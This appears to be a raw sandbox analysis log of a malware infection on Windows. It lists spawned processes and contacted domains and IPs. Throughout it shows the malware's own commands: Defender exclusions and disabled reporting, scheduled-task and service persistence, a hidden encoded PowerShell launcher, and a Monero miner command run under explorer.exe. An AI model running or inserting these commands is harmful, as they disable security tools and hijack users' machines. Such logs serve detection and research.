C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20748e484444d9200.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat204ab24d039a58be8.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe

Sat20049528047bed.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe

Sat20748e484444d9200.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat204ab24d039a58be8.exe

Sat204ab24d039a58be8.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5048 -ip 5048

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe

Sat20474d8e68c3f86b.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe

Sat20e3fc574eb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 556

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe

Sat2060d0e3bfa5f726.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2027462f7d873c4.exe

Sat2027462f7d873c4.exe

C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp" /SL5="$9005C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe"

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe

Sat20644077cb3868ccd.exe

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 824

C:\Users\Admin\AppData\Local\Temp\jzhang-game.exe

"C:\Users\Admin\AppData\Local\Temp\jzhang-game.exe"

C:\Users\Admin\AppData\Local\Temp\Pubdate.exe

"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"

C:\Users\Admin\AppData\Local\Temp\CmdCalc.exe

"C:\Users\Admin\AppData\Local\Temp\CmdCalc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1040

C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe

"C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe"

C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe

"C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe"

C:\Users\Admin\Pictures\Adobe Films\hVc81UAyx3ob_zfwfBaFesk3.exe

"C:\Users\Admin\Pictures\Adobe Films\hVc81UAyx3ob_zfwfBaFesk3.exe"

C:\Users\Admin\Pictures\Adobe Films\3FrOcX1AbJQcmi5mvBqmmZ83.exe

"C:\Users\Admin\Pictures\Adobe Films\3FrOcX1AbJQcmi5mvBqmmZ83.exe"

C:\Users\Admin\Pictures\Adobe Films\UyTDC8ZfabL_d71ur1ZMAWjB.exe

"C:\Users\Admin\Pictures\Adobe Films\UyTDC8ZfabL_d71ur1ZMAWjB.exe"

C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe

"C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe"

C:\Users\Admin\Pictures\Adobe Films\5D0dcuBXosBkrDZ2NiVgdBGI.exe

"C:\Users\Admin\Pictures\Adobe Films\5D0dcuBXosBkrDZ2NiVgdBGI.exe"

C:\Users\Admin\Pictures\Adobe Films\3WZzJ5dTCbj5mTezMD4IFrOX.exe

"C:\Users\Admin\Pictures\Adobe Films\3WZzJ5dTCbj5mTezMD4IFrOX.exe"

C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe

"C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe"

C:\Users\Admin\Pictures\Adobe Films\HvkGDTvAampfOwnHFnjN1B3M.exe

"C:\Users\Admin\Pictures\Adobe Films\HvkGDTvAampfOwnHFnjN1B3M.exe"

C:\Users\Admin\Pictures\Adobe Films\uRMi6UoSbM6X9YnNOWaQzaEa.exe

"C:\Users\Admin\Pictures\Adobe Films\uRMi6UoSbM6X9YnNOWaQzaEa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1036

C:\Windows\Temp\123.exe

"C:\Windows\Temp\123.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1092

C:\Users\Admin\AppData\Local\Temp\is-KIR5B.tmp\5D0dcuBXosBkrDZ2NiVgdBGI.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KIR5B.tmp\5D0dcuBXosBkrDZ2NiVgdBGI.tmp" /SL5="$2021A,855234,51712,C:\Users\Admin\Pictures\Adobe Films\5D0dcuBXosBkrDZ2NiVgdBGI.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Program Files (x86)\Split Files\KitFiles136.exe

"C:\Program Files (x86)\Split Files\KitFiles136.exe"

C:\Windows\Temp\321.exe

"C:\Windows\Temp\321.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe

"C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe" -h

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1172 -ip 1172

C:\Users\Admin\AppData\Roaming\{6eb576c0-6208-11ed-9190-806e6f6e6963}\3zz0vsPBG.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3644 -ip 3644

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe

"C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe" -h

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1532

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1900 -ip 1900

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1160

C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe

"C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1564 -ip 1564

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bxmgedut\

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1900 -ip 1900

C:\Users\Admin\Documents\9BLuYLAIr5W95O4pP6R5hyzw.exe

"C:\Users\Admin\Documents\9BLuYLAIr5W95O4pP6R5hyzw.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hbriljmv.exe" C:\Windows\SysWOW64\bxmgedut\

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1172 -ip 1172

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1592

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" create bxmgedut binPath= "C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe /d\"C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe\"" type= own start= auto DisplayName= "wifi support"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 892 -ip 892

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" description bxmgedut "wifi internet conection"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1600

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" start bxmgedut

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{RiWR-MmVzb-tK2N-mIGJw}\66207056207.exe"

C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe

C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe /d"C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe"

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{RiWR-MmVzb-tK2N-mIGJw}\60067572108.exe" /mix

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1172 -ip 1172

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{RiWR-MmVzb-tK2N-mIGJw}\39690270368.exe" /mix

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 688 -ip 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 1044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4116 -ip 4116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 760

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1608

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\Pictures\Adobe Films\4X9dWSWmBGkHblEmFClhH8zH.exe

"C:\Users\Admin\Pictures\Adobe Films\4X9dWSWmBGkHblEmFClhH8zH.exe"

C:\Users\Admin\Pictures\Adobe Films\s2XjivwN51fyOeyMo2ClyUF0.exe

"C:\Users\Admin\Pictures\Adobe Films\s2XjivwN51fyOeyMo2ClyUF0.exe"

C:\Users\Admin\Pictures\Adobe Films\_qwRGuZsUu_0fPLJBxrNFKmz.exe

"C:\Users\Admin\Pictures\Adobe Films\_qwRGuZsUu_0fPLJBxrNFKmz.exe"

C:\Users\Admin\Pictures\Adobe Films\72zPrupnUrkMFHfFe2gbP0Vo.exe

"C:\Users\Admin\Pictures\Adobe Films\72zPrupnUrkMFHfFe2gbP0Vo.exe"

C:\Users\Admin\Pictures\Adobe Films\XQDHziNEAgSPFmT6oza10to4.exe

"C:\Users\Admin\Pictures\Adobe Films\XQDHziNEAgSPFmT6oza10to4.exe"

C:\Users\Admin\Pictures\Adobe Films\usJdVBE4X4Hiz2PX4GR_SWci.exe

"C:\Users\Admin\Pictures\Adobe Films\usJdVBE4X4Hiz2PX4GR_SWci.exe"

C:\Users\Admin\Pictures\Adobe Films\Crbl_0YFj85YnxRhcsnSjTOz.exe

"C:\Users\Admin\Pictures\Adobe Films\Crbl_0YFj85YnxRhcsnSjTOz.exe"

C:\Users\Admin\Pictures\Adobe Films\dXe7WiEh2GDlU_HMXti_T8yn.exe

"C:\Users\Admin\Pictures\Adobe Films\dXe7WiEh2GDlU_HMXti_T8yn.exe"

C:\Users\Admin\Pictures\Adobe Films\KnaVDg56ODZxLTmpGgCTtV50.exe

"C:\Users\Admin\Pictures\Adobe Films\KnaVDg56ODZxLTmpGgCTtV50.exe"

C:\Users\Admin\Pictures\Adobe Films\wOdINyiTEz6Sxnss3QFqU_pO.exe

"C:\Users\Admin\Pictures\Adobe Films\wOdINyiTEz6Sxnss3QFqU_pO.exe"

C:\Users\Admin\AppData\Local\Temp\is-EUU12.tmp\_qwRGuZsUu_0fPLJBxrNFKmz.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EUU12.tmp\_qwRGuZsUu_0fPLJBxrNFKmz.tmp" /SL5="$801FA,140518,56832,C:\Users\Admin\Pictures\Adobe Films\_qwRGuZsUu_0fPLJBxrNFKmz.exe"

C:\Users\Admin\AppData\Local\Temp\is-FQQ19.tmp\72zPrupnUrkMFHfFe2gbP0Vo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FQQ19.tmp\72zPrupnUrkMFHfFe2gbP0Vo.tmp" /SL5="$8024E,855234,51712,C:\Users\Admin\Pictures\Adobe Films\72zPrupnUrkMFHfFe2gbP0Vo.exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2260 -ip 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 536

C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe

"C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3040 -ip 3040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 1228

C:\Users\Admin\AppData\Local\Temp\is-RP94G.tmp\ty88__.exe

"C:\Users\Admin\AppData\Local\Temp\is-RP94G.tmp\ty88__.exe" /S /UID=95

C:\Users\Admin\AppData\Local\Temp\7zS2759.tmp\Install.exe

.\Install.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe" /F

C:\Users\Admin\AppData\Local\Temp\7zS31AA.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\be894f49a9" /P "Admin:N"&&CACLS "..\be894f49a9" /P "Admin:R" /E&&Exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe

"C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\cacls.exe

CACLS "nbveek.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe

"C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Program Files\Windows Sidebar\DENDKORUTY\poweroff.exe

"C:\Program Files\Windows Sidebar\DENDKORUTY\poweroff.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\16-7c271-d37-69eac-b55962f1aca4d\Rodazhashyma.exe

"C:\Users\Admin\AppData\Local\Temp\16-7c271-d37-69eac-b55962f1aca4d\Rodazhashyma.exe"

C:\Users\Admin\AppData\Local\Temp\17-75fae-de8-8309e-9c8680197f029\Woqipyzhaezhi.exe

"C:\Users\Admin\AppData\Local\Temp\17-75fae-de8-8309e-9c8680197f029\Woqipyzhaezhi.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Users\Admin\AppData\Local\Temp\is-P3HD7.tmp\poweroff.tmp

"C:\Users\Admin\AppData\Local\Temp\is-P3HD7.tmp\poweroff.tmp" /SL5="$10304,490199,350720,C:\Program Files\Windows Sidebar\DENDKORUTY\poweroff.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Program Files (x86)\powerOff\Power Off.exe

"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 744

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cacls.exe

CACLS "nbveek.exe" /P "Admin:R" /E

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\be894f49a9" /P "Admin:N"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gprRqKChw" /SC once /ST 03:50:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\cacls.exe

CACLS "..\be894f49a9" /P "Admin:R" /E

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gprRqKChw"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe

"C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 hsiens.xyz udp
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 8.8.8.8:53 staticimg.youtuuee.com udp
N/A 8.8.8.8:53 a.goatgame.co udp
N/A 8.8.8.8:53 the-flash-man.com udp
N/A 8.8.8.8:53 best-link-app.com udp
N/A 8.8.8.8:53 theonlinesportsgroup.net udp
N/A 8.8.8.8:53 remotenetwork.xyz udp
N/A 8.8.8.8:53 remotepc3.xyz udp
N/A 8.8.8.8:53 2no.co udp
N/A 148.251.234.93:443 2no.co tcp
N/A 37.0.10.214:80 37.0.10.214 tcp
N/A 8.8.8.8:53 iplogger.org udp
N/A 148.251.234.83:443 iplogger.org tcp
N/A 37.0.10.244:80 37.0.10.244 tcp
N/A 8.8.8.8:53 s.lletlee.com udp
N/A 8.8.8.8:53 wfsdragon.ru udp
N/A 104.21.5.208:80 wfsdragon.ru tcp
N/A 8.8.8.8:53 qwertys.info udp
N/A 148.251.234.83:443 iplogger.org tcp
N/A 212.193.30.115:80 212.193.30.115 tcp
N/A 107.182.129.251:80 107.182.129.251 tcp
N/A 8.8.8.8:53 ipinfo.io udp
N/A 34.117.59.81:443 ipinfo.io tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.130.233:80 cdn.discordapp.com tcp
N/A 162.159.130.233:80 cdn.discordapp.com tcp
N/A 162.159.130.233:80 cdn.discordapp.com tcp
N/A 162.159.130.233:443 cdn.discordapp.com tcp
